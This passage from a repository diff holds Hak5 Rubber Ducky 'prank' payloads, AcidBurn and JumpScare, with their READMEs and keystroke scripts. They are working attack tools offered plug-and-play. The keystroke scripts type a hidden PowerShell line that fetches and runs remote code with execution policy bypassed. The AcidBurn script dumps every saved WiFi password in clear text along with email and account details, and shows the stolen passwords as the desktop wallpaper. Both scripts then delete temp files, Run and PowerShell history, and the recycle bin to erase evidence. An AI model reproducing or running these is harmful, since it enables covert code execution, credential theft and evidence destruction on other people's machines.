return "your public I P address is $computerPubIP"
}
# echo statement used to track progress while debugging
echo "Pub IP Done"
###########################################################################################################
<#
.NOTES
Wifi Network and Password
This function will custom a tailor response based on how many characters long their password is
#>
function Get-Pass {
#-----VARIABLES-----#
# $pwl = their Pass Word Length
# $pass = their Password
try {
$pro = netsh wlan show interface | Select-String -Pattern ' SSID '; $pro = [string]$pro
$pos = $pro.IndexOf(':')
$pro = $pro.Substring($pos+2).Trim()
$pass = netsh wlan show profile $pro key=clear | Select-String -Pattern 'Key Content'; $pass = [string]$pass
$passPOS = $pass.IndexOf(':')
$pass = $pass.Substring($passPOS+2).Trim()
if($pro -like '*_5GHz*') {
$pro = $pro.Trimend('_5GHz')
}
$pwl = $pass.length
}
# If no network is detected function will return $null to avoid sapi speak
# Write Error is just for troubleshooting
catch {Write-Error "No network was detected"
return $null
-ErrorAction SilentlyContinue
}
# ENTER YOUR CUSTOM RESPONSES HERE
#----------------------------------------------------------------------------------------------------
$badPASS = "$pro is not a very creative name but at least it is not as bad as your wifi password... only $pwl characters long? $pass ...? really..? $pass was the best you could come up with?"
$okPASS = "$pro is not a very creative name but at least you are trying a little bit, your password is $pwl characters long, still trash though.. $pass ...? You can do better"
$goodPASS = "$pro is not a very creative name but At least you are not a total fool... $pwl character long password actually is not bad, but it did not save you from me did it? no..it..did..not! $pass is a decent password though."
#----------------------------------------------------------------------------------------------------
if($pass.length -lt 8) { return $badPASS
}elseif($pass.length -gt 7 -and $pass.length -lt 12) { return $okPASS
}else { return $goodPASS
}
}
# echo statement used to track progress while debugging
echo "Wifi pass Done"
###########################################################################################################
<#
.NOTES
All Wifi Networks and Passwords
This function will gather all current Networks and Passwords saved on the target computer
They will be save in the temp directory to a file named with "$env:USERNAME-$(get-date -f yyyy-MM-dd)_WiFi-PWD.txt"
#>
Function Get-Networks {
# Get Network Interfaces
$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress
# Get Wifi SSIDs and Passwords
$WLANProfileNames =@()
#Get all the WLAN profile names
$Output = netsh.exe wlan show profiles | Select-String -pattern " : "
#Trim the output to receive only the name
Foreach($WLANProfileName in $Output){
$WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim()
}
$WLANProfileObjects =@()
#Bind the WLAN profile names and also the password to a custom object
Foreach($WLANProfileName in $WLANProfileNames){
#get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user
try{
$WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim()
}Catch{
$WLANProfilePassword = "The password is not stored in this profile"
}
#Build the object and add this to an array
$WLANProfileObject = New-Object PSCustomobject
$WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfileName" -Value $WLANProfileName
$WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword
$WLANProfileObjects += $WLANProfileObject
Remove-Variable WLANProfileObject
return $WLANProfileObjects
}
}
$Networks = Get-Networks
Add-Type @"
using System;
using System.Runtime.InteropServices;
public class PInvoke {
[DllImport("user32.dll")] public static extern IntPtr GetDC(IntPtr hwnd);
[DllImport("gdi32.dll")] public static extern int GetDeviceCaps(IntPtr hdc, int nIndex);
}
"@
$hdc = [PInvoke]::GetDC([IntPtr]::Zero)
$w = [PInvoke]::GetDeviceCaps($hdc, 118) # width
$h = [PInvoke]::GetDeviceCaps($hdc, 117) # height
<#
.NOTES
This will take the image you generated and set it as the targets wall paper
#>
Function Set-WallPaper {
<#
.SYNOPSIS
Applies a specified wallpaper to the current user's desktop
.PARAMETER Image
Provide the exact path to the image
.PARAMETER Style
Provide wallpaper style (Example: Fill, Fit, Stretch, Tile, Center, or Span)
.EXAMPLE
Set-WallPaper -Image "C:\Wallpaper\Default.jpg"
Set-WallPaper -Image "C:\Wallpaper\Background.jpg" -Style Fit
#>
param (
[parameter(Mandatory=$True)]
# Provide path to image
[string]$Image,
# Provide wallpaper style that you would like applied
[parameter(Mandatory=$False)]
[ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')]
[string]$Style
)
$WallpaperStyle = Switch ($Style) {
"Fill" {"10"}
"Fit" {"6"}
"Stretch" {"2"}
"Tile" {"0"}
"Center" {"0"}
"Span" {"22"}
}
If($Style -eq "Tile") {
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 1 -Force
}
Else {
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 0 -Force
}
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public class Params
{
[DllImport("User32.dll",CharSet=CharSet.Unicode)]
public static extern int SystemParametersInfo (Int32 uAction,
Int32 uParam,
String lpvParam,
Int32 fuWinIni);
}
"@
$SPI_SETDESKWALLPAPER = 0x0014
$UpdateIniFile = 0x01
$SendChangeEvent = 0x02
$fWinIni = $UpdateIniFile -bor $SendChangeEvent
$ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni)
}
#############################################################################################################################################
Function WallPaper-Troll {
if (!$Networks) { Write-Host "variable is null"
}else {
# This is the name of the file the networks and passwords are saved
$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_WiFi-PWD.txt"
($Networks| Out-String) >> $Env:temp\$FileName
$content = [IO.File]::ReadAllText("$Env:temp\$FileName")
# this is the message that will be coded into the image you use as the wallpaper
$hiddenMessage = "`n`nMy crime is that of curiosity `nand yea curiosity killed the cat `nbut satisfaction brought him back `n with love -Jakoby"
# this will be the name of the image you use as the wallpaper
$ImageName = "dont-be-suspicious"
<#
.NOTES
This will get take the information gathered and format it into a .jpg
#>
Add-Type -AssemblyName System.Drawing
$filename = "$env:tmp\foo.jpg"
$bmp = new-object System.Drawing.Bitmap $w,$h
$font = new-object System.Drawing.Font Consolas,18
$brushBg = [System.Drawing.Brushes]::White
$brushFg = [System.Drawing.Brushes]::Black
$graphics = [System.Drawing.Graphics]::FromImage($bmp)
$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height)
$graphics.DrawString($content,$font,$brushFg,500,100)
$graphics.Dispose()
$bmp.Save($filename)
# Invoke-Item $filename
<#
.NOTES
This will take your hidden message and use steganography to hide it in the image you use as the wallpaper
Then it will clean up the files you don't want to leave behind
#>
echo $hiddenMessage > $Env:temp\foo.txt
cmd.exe /c copy /b "$Env:temp\foo.jpg" + "$Env:temp\foo.txt" "$Env:USERPROFILE\Desktop\$ImageName.jpg"
rm $env:TEMP\foo.txt,$env:TEMP\foo.jpg -r -Force -ErrorAction SilentlyContinue
#############################################################################################################################################
# This will open up notepad with all their saved networks and passwords and taunt them
$s.Speak("wanna see something really cool?")
Set-WallPaper -Image "$Env:USERPROFILE\Desktop\$ImageName.jpg" -Style Center
$s.Speak("Look at all your other passswords I got..")
Start-Sleep -Seconds 1
$s.Speak("These are the wifi passwords for every network you've ever connected to!")
Start-Sleep -Seconds 1
$s.Speak("I could send them to myself but i wont")
}
# echo statement used to track progress while debugging
echo "All Wifi Passes Done"
}
###########################################################################################################
<#
.NOTES
Password last Set
This function will custom tailor a response based on how long it has been since they last changed their password
#>
function Get-Days_Set {
#-----VARIABLES-----#
# $pls (password last set) = the date/time their password was last changed
# $days = the number of days since their password was last changed
try {
$pls = net user $env:UserName | Select-String -Pattern "Password last" ; $pls = [string]$pls
$plsPOS = $pls.IndexOf("e")
$pls = $pls.Substring($plsPOS+2).Trim()
$pls = $pls -replace ".{3}$"
$time = ((get-date) - (get-date "$pls")) ; $time = [string]$time
$DateArray =$time.Split(".")
$days = [int]$DateArray[0]
}
# If no password set date is detected funtion will return $null to cancel Sapi Speak
# Write Error is just for troubleshooting
catch {Write-Error "Day password set not found"
return $null
-ErrorAction SilentlyContinue
}
# ENTER YOUR CUSTOM RESPONSES HERE
#----------------------------------------------------------------------------------------------------
$newPass = "$pls was the last time you changed your password... You changed your password $days days ago.. I have to applaud you.. at least you change your password often. Still did not stop me! "
$avgPASS = "$pls was the last time you changed your password... it has been $days days since you changed your password, really starting to push it, i mean look i am here. that tells you something "
$oldPASS = "$pls was the last time you changed your password... it has been $days days since you changed your password, you were basically begging me to hack you, well here i am! "
#----------------------------------------------------------------------------------------------------
if($days -lt 45) { return $newPass
}elseif($days -gt 44 -and $days -lt 182) { return $avgPASS
}else { return $oldPASS
}
}
# echo statement used to track progress while debugging
echo "Pass last set Done"
###########################################################################################################
<#
.NOTES
Get Email
This function will custom tailor a response based on what type of email the target has
#>
function Get-email {
try {
$email = GPRESULT -Z /USER $Env:username | Select-String -Pattern "([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})" -AllMatches;$email = ("$email").Trim()
$emailpos = $email.IndexOf("@")
$domain = $email.Substring($emailpos+1) #.TrimEnd(".com")
}
# If no email is detected function will return backup message for sapi speak
# Write Error is just for troubleshooting
catch {Write-Error "An email was not found"
return "you're lucky you do not have your email connected to your account, I would have really had some fun with you then lol"
-ErrorAction SilentlyContinue
}
# ENTER YOUR CUSTOM RESPONSES HERE
#----------------------------------------------------------------------------------------------------
$gmailResponse = "At least you use G Mail.. we should be friends. If you are down just email me back, ill message you at $email. That is your email right?"
$yahooResponse = "a yahoo account seriously? you are either in your 50's or just got done doing some time, a lot of it.. $email .. this is sad"
$hotmailResponse = "really?. you have a hotmail account? $email .. I am sending this to the f b I they need to check your hard drive"
$otherEmailResponse = "I dead ass do not even know what this is.. $email .. hope you did not think it was safe"
#----------------------------------------------------------------------------------------------------
if($email -like '*gmail*') { return $gmailResponse
}elseif($email -like '*yahoo*') { return $yahooResponse
}elseif($email -like '*hotmail*') { return $hotmailResponse
}else { return $otherEmailResponse}
}
# echo statement used to track progress while debugging
echo "Email Done"
###########################################################################################################
<#
.NOTES
Messages
This function will run all the previous functions and assign their outputs to variables
#>
$intro = "$fullName , it has been a long time my friend"
$RAMwarn = Get-RAM
$PUB_IPwarn = Get-PubIP
$PASSwarn = Get-Pass
$LAST_PASSwarn = Get-Days_Set
$EMAILwarn = Get-email
$OUTRO = "My crime is that of curiosity.... and yea curiosity killed the cat.... but satisfaction brought him back.... later $fullName"
# echo statement used to track progress while debugging
echo "Speak Variables set"
###########################################################################################################
# This turns the volume up to max level--------------------------------------------------------------------
#$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}
# echo statement used to track progress while debugging
echo "Volume to max level"
###########################################################################################################
<#
.NOTES
These two snippets are meant to be used as indicators to let you know the script is set up and ready
This will display a pop up window saying "hello $fullname"
Or this makes the CapsLock indicator light blink however many times you set it to
if you do not want the ready notice to pop up or the CapsLock light to blink comment them out below
#>
# a popup will be displayed before freezing the script while waiting for the cursor to move to continue the script
# else capslock light will blink as an indicator
$popmessage = "Hello $fullName"
$readyNotice = New-Object -ComObject Wscript.Shell;$readyNotice.Popup($popmessage)
# caps lock indicator light
$blinks = 3;$o=New-Object -ComObject WScript.Shell;for ($num = 1 ; $num -le $blinks*2; $num++){$o.SendKeys("{CAPSLOCK}");Start-Sleep -Milliseconds 250}
#-----------------------------------------------------------------------------------------------------------
<#
.NOTES
Then the script will be paused until the mouse is moved
script will check mouse position every indicated number of seconds
This while loop will constantly check if the mouse has been moved
"CAPSLOCK" will be continously pressed to prevent screen from turning off
it will then sleep for the indicated number of seconds and check again
when mouse is moved it will break out of the loop and continue theipt
#>
Add-Type -AssemblyName System.Windows.Forms
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
while (1) {
$pauseTime = 3
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
break
}
else {
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
}
}
echo "it worked"
###########################################################################################################
# this is where your message is spoken line by line
$s=New-Object -ComObject SAPI.SpVoice
# This sets how fast Sapi Speaks
$s.Rate = -1
$s.Speak($intro)
$s.Speak($RAMwarn)
$s.Speak($PUB_IPwarn)
$s.Speak($PASSwarn)
WallPaper-Troll
$s.Speak($LAST_PASSwarn)
$s.Speak($EMAILwarn)
$s.Speak($OUTRO)
###########################################################################################################
# this snippet will leave a message on your targets desktop
$message = "`nMy crime is that of curiosity `nand yea curiosity killed the cat `nbut satisfaction brought him back"
Add-Content $home\Desktop\WithLove.txt $message
###########################################################################################################
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
#----------------------------------------------------------------------------------------------------
# This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off
Add-Type -AssemblyName System.Windows.Forms
$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
#If true, toggle CapsLock key, to ensure that the script doesn't fail
if ($caps -eq $true){
$key = New-Object -ComObject WScript.Shell
$key.SendKeys('{CapsLock}')
}

112
payloads/library/prank/-RD-AcidBurn/README.md Normal file
View File

@ -0,0 +1,112 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Acid Burn
A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes.
## Description
This program enumerates a target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account.
The SSID and WiFi password of any current or previously connected to networks.
It determines the last day they changed thier password and how many days ago.
Once the information is gathered the script will pause until a mouse movement is detected
Then the script uses Sapi speak to roast their set up and lack of security
If wifi networks and passwords are detected wallpaper will be changed to image displaying that information
Image generated will be saved to desktop, steganography is used to put hidden message at bottom of binary output of image generated
## Getting Started
### Dependencies
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your Bash Bunny
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
* Enumerate and get Full Name, Amount of RAM, Public IP, Wifi Password Length, Wifi Networks and Passwords, Day Password was last changed, Email
* Custom responses have been programmed to roast the target based on the information gathered during enumeration phase
* Wifi Networks and passwords will be generated into an image that will be saved on the desktop
* Image opened in notepad will reveal a hidden message at the bottom of the binary output
* Script will freeze until a mouse movement is detected
* Sapi Speak will be used to speak out loud the custom responses
* Desktop wallpaper will be changed to the image of the targets Wifi Networks and Passwords
* Text file will be left on the target desktop with whatever message you choose
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/RubberDucky/Payloads/RD-AcidBurn/hacked-wallpaper.jpg)
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
Arf
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-AcidBurn)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
* [0iphor13](https://github.com/0iphor13)
* [PhilSutter](https://github.com/PhilSutter)
<p align="right">(<a href="#top">back to top</a>)</p>

BIN
payloads/library/prank/-RD-AcidBurn/hacked-wallpaper.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 76 KiB

16
payloads/library/prank/-RD-AcidBurn/payload.txt Normal file
View File

@ -0,0 +1,16 @@
REM Title: AcidBurn
REM Author: I am Jakoby
REM Description: This payload is meant to torment your target to the fullest extent. Mission to recon then roast. See README.md for more details
REM Target: Windows 10, 11
REM --------------------------------------------------------------------------------------
REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
REM --------------------------------------------------------------------------------------
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-AcidBurn/AcidBurn.ps1?dl=1; invoke-expression $pl
ENTER

217
payloads/library/prank/-RD-JumpScare/JumpScare.ps1 Normal file
View File

@ -0,0 +1,217 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : JumpScare | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.NOTES
This script can be run as is with the provided execution file
.DESCRIPTION
This script will download a scary image and a scream sound effect hosted with this payload and host volume will be raised to max level
Upon running this script it will immediately pause after the downloads until a mouse movement is detected
The capslock button will be pressed every 3 seconds to prevent sleep, and act as an indicator the payload is ready
After a mouse movement is detected their wallpaper will change to the scary image provided and the scream sound effect will play
#>
############################################################################################################################################################
# Download Image; replace link to $image to add your own image
$image = "https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/OMG/Payloads/OMG-JumpScare/jumpscare.png"
$i = -join($image,"?dl=1")
iwr $i -O $env:TMP\i.png
iwr https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/OMG/Payloads/OMG-JumpScare/jumpscare.png?dl=1 -O $env:TMP\i.png
# Download WAV file; replace link to $wav to add your own sound
$wav = "https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-JumpScare/female_scream.wav?raw=true"
$w = -join($wav,"?dl=1")
iwr $w -O $env:TMP\s.wav
#----------------------------------------------------------------------------------------------------
<#
.NOTES
This will take the image you downloaded and set it as the targets wall paper
#>
Function Set-WallPaper {
<#
.SYNOPSIS
Applies a specified wallpaper to the current user's desktop
.PARAMETER Image
Provide the exact path to the image
.PARAMETER Style
Provide wallpaper style (Example: Fill, Fit, Stretch, Tile, Center, or Span)
.EXAMPLE
Set-WallPaper -Image "C:\Wallpaper\Default.jpg"
Set-WallPaper -Image "C:\Wallpaper\Background.jpg" -Style Fit
#>
param (
[parameter(Mandatory=$True)]
# Provide path to image
[string]$Image,
# Provide wallpaper style that you would like applied
[parameter(Mandatory=$False)]
[ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')]
[string]$Style
)
$WallpaperStyle = Switch ($Style) {
"Fill" {"10"}
"Fit" {"6"}
"Stretch" {"2"}
"Tile" {"0"}
"Center" {"0"}
"Span" {"22"}
}
If($Style -eq "Tile") {
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 1 -Force
}
Else {
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 0 -Force
}
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public class Params
{
[DllImport("User32.dll",CharSet=CharSet.Unicode)]
public static extern int SystemParametersInfo (Int32 uAction,
Int32 uParam,
String lpvParam,
Int32 fuWinIni);
}
"@
$SPI_SETDESKWALLPAPER = 0x0014
$UpdateIniFile = 0x01
$SendChangeEvent = 0x02
$fWinIni = $UpdateIniFile -bor $SendChangeEvent
$ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni)
}
#----------------------------------------------------------------------------------------------------
<#
.NOTES
This is to pause the script until a mouse movement is detected
#>
function Pause-Script{
Add-Type -AssemblyName System.Windows.Forms
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
$o=New-Object -ComObject WScript.Shell
while (1) {
$pauseTime = 3
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
break
}
else {
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
}
}
}
#----------------------------------------------------------------------------------------------------
<#
.NOTES
This is to play the WAV file
#>
function Play-WAV{
$PlayWav=New-Object System.Media.SoundPlayer;$PlayWav.SoundLocation="$env:TMP\s.wav";$PlayWav.playsync()
}
#----------------------------------------------------------------------------------------------------
# This turns the volume up to max level
$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}
#----------------------------------------------------------------------------------------------------
Pause-Script
Set-WallPaper -Image "$env:TMP\i.png" -Style Center
Play-WAV
#----------------------------------------------------------------------------------------------------
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
#----------------------------------------------------------------------------------------------------
# This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off
Add-Type -AssemblyName System.Windows.Forms
$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
#If true, toggle CapsLock key, to ensure that the script doesn't fail
if ($caps -eq $true){
$key = New-Object -ComObject WScript.Shell
$key.SendKeys('{CapsLock}')
}

102
payloads/library/prank/-RD-JumpScare/README.md Normal file
View File

@ -0,0 +1,102 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# JumpScare
A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes.
## Description
This script starts off using Invoke-WebRequests to download both and Image and Sound file
Their system volume is then turned up to the max level
The script will be paused until a mouse movement is detected
At that point there desktop wallpaper will be changed to the scary image provided and the scream sound effect will be played
## Getting Started
### Dependencies
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-JumpScare/JumpScare.ps1?dl=1; invoke-expression $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
Arf
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-JumpScare)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
* [0iphor13](https://github.com/0iphor13)
* [PhilSutter](https://github.com/PhilSutter)
<p align="right">(<a href="#top">back to top</a>)</p>

BIN
payloads/library/prank/-RD-JumpScare/female_scream.wav Normal file
View File

Binary file not shown.

BIN
payloads/library/prank/-RD-JumpScare/jumpscare.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 934 KiB

23
payloads/library/prank/-RD-JumpScare/payload.txt Normal file
View File

@ -0,0 +1,23 @@
REM Title: JumpScare
REM Author: I am Jakoby
REM Description: This payload is meant to torment your target to the fullest extent. Mission to JumpScare. See JumpScare.ps1 for more details
REM Target: Windows 10, 11
REM Start by minimizing all their current windows
GUI m
DELAY 500
REM Remember to replace the link with your link for the intended file to download if you are using a custom variation of this payload
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
REM --------------------------------------------------------------------------------------
REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
REM --------------------------------------------------------------------------------------
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-JumpScare/JumpScare.ps1?dl=1; invoke-expression $pl
ENTER

BIN
payloads/library/prank/-RD-PS-Draw/Images/PS-Draw.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 20 KiB

1
payloads/library/prank/-RD-PS-Draw/Images/images Normal file
View File

@ -0,0 +1 @@
images will be stored here

BIN
payloads/library/prank/-RD-PS-Draw/Images/omg-ico.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 383 B

BIN
payloads/library/prank/-RD-PS-Draw/Images/ps-colors.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 16 KiB

BIN
payloads/library/prank/-RD-PS-Draw/Images/ps-hak5.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 18 KiB

BIN
payloads/library/prank/-RD-PS-Draw/Images/ps-omg.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 11 KiB

232
payloads/library/prank/-RD-PS-Draw/PS-Custom-Draw.ps1 Normal file
View File

@ -0,0 +1,232 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : PS-CustomDraw | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
